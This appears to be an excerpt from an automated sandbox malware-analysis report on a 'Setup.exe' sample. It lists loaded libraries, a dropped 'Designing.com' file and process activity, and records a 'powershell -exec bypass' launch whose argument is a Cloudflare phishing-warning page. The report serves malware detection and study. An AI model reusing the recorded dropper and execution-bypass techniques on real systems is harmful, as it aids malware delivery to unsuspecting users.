Source: C:\Users\user\Desktop\Setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Setup.exe Static file information: File size 73409776 > 1048576
Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC0DE6 push ecx; ret 12_2_00DC0DF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_071B05D8 push FFFFFFE8h; iretd 16_2_071B05DD

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E326DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_00E326DD
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DBFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_00DBFC7C
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
